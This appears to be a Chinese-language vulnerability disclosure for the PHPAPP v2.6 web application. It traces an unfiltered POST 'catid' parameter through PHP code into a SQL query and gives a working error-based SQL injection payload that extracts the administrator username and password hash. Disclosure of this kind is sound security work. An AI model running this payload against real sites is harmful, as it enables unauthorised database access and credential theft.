PHPAPP注入第五枚（无视过滤）

### 简要描述： PHPAPP注入第五枚（无视过滤） ### 详细说明： 在wooyun上看到了有人提了PHPAPP的漏洞： http://wooyun.org/bugs/wooyun-2010-055604，然后去官网看了看，前几天刚有更新，就在官网下了PHPAPP最新的v2.6来看看(2014-12-11更新的)。 PSOT注入点：wwww.xxx.com /member.php?app=82&action=1 , 存在漏洞的文件在/phpapp/apps/sellerservice/member_phpapp.php 来看看漏洞是如何产生的/phpapp/apps/sellerservice/member_phpapp.php ``` public function AddServiceAction(){ 无关代码 if($this->POST['submit']){ if($this->CheckSecurityForm($this->POST['SecurityForm'])){ 无关代码 //上传文件 $files=$this->UploadFile(); if($files){ foreach($files as $fid){ $this->Insert('apps_file',array('appid'=>$this->app,'fid'=>$fid,'uid'=>$this->uid,'id'=>$this->sid,'type'=>1),array()); } $this->ReplaceFileContent($files,'task_seller_service',$this->POST['content']," WHERE sid='$this->sid' "); } }else{ //echo '<p>'.$allow.'</p>'; $this->SubmitServiceForm($allow); } $this->UpdateCategoryCount('task_seller_service',$this->POST['catid'],'',''); $servicenum=$this->IsSQL('task_seller_service',"WHERE status=0 AND uid='$this->uid'"); $this->UpdateTaskCount('servicenum',$servicenum,$this->uid); 无关代码 } ``` 看到 $this->UpdateCategoryCount('task_seller_service',$this->POST['catid'],'','');去看看UpdateCategoryCount ``` function UpdateCategoryCount($table,$catid=0,$total=0,$where=''){ //更新上级 $categoryone=$this->GetMysqlOne('*'," ".$this->GetTable('category')." WHERE catid='$catid' "); if($categoryone){ if(!$total){ $tasknum=$this->IsSQL($table,"WHERE catid='$catid' $where "); }else{ $tasknum=$total; } $this->Update('category',array('total'=>$tasknum),array(),"WHERE catid='$catid'"); $upid=$categoryone['upid']; $categoryarr=$this->GetMysqlOne('*'," ".$this->GetTable('category')." WHERE catid='$upid' "); if($categoryarr){ $up=$this->GetMysqlOne(' sum(total) AS totals '," ".$this->GetTable('category')." WHERE upid='$upid' "); $this->UpdateCategoryCount($table,$upid,$up['totals']); } } } ``` 调用了GetMysqlOne，再付出看看GetMysqlOne ``` public function GetMysqlOne($key='*',$whereif=''){ $sqldata= array(); $query=sprintf('SELECT %s FROM %s',$key,$whereif); $sqldata=mysql_fetch_array($this->MysqlQuery($query),MYSQL_ASSOC); if (is_array($sqldata)){ return $sqldata; }else{ return false; } } ``` 在把$_POST的值赋$this->POST时，对类似于’string_s’的参数进行了过滤，只要结尾不是’_s’就可以绕过过滤。 可以看到：$this->POST['catid']再没有经过任何过滤，造成了注入。 Phpapp可以显错，那就用error-based blind进行注入。 Pyload：(POST提交) ``` 2' or (select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(0x23,username,0x23,password) from phpapp_member limit 0,1))a from phpapp_member group by a)b) or' ``` 注入成功，管理员用户名及密码如下图中所示： [<img src="https://images.seebug.org/upload/201412/242356004de0a532e5ff2b428ca863070b85e8fb.jpg" alt="注入成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/242356004de0a532e5ff2b428ca863070b85e8fb.jpg) ### 漏洞证明： 见 详细说明